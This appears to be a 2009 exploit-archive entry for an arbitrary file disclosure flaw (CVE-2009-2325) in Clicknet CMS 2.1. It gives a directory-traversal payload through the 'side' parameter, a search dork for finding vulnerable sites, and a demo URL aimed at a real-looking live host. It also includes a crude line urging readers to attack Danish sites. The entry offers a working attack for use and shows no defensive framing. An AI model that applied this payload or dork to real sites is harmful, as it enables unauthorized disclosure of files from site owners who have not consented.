Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure

Author: ThE g0bL!N
type: webapps
platform: php
port: 
date_added: 2009-06-28 
date_updated:  
verified: 1 
codes: OSVDB-55484;CVE-2009-2325 
tags: 
aliases:  
screenshot_url:  
application_url: 

#################################################################################################################
[+] Clicknet CMS v2.1(side) File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
[+] Vendor:http://cms.clicknet.dk
[+} Download:http://cms.clicknet.dk/download/index.php?test=2
[+] Dork:"Powered by Clicknet CMS"
[+] Note: All Site Danemark So Fuck It please :)
[+] Greets : R3d-D3v!L
#################################################################################################################
Exploit:
-------
Exploit
---
http://127.0.0.1/index.php?side=../index [ out of .php ]
Then View Source To Get A good View
Demo
----
http://www.t68.clicknet.dk/index.php?side=../index
################################################################################################################

# milw0rm.com [2009-06-29]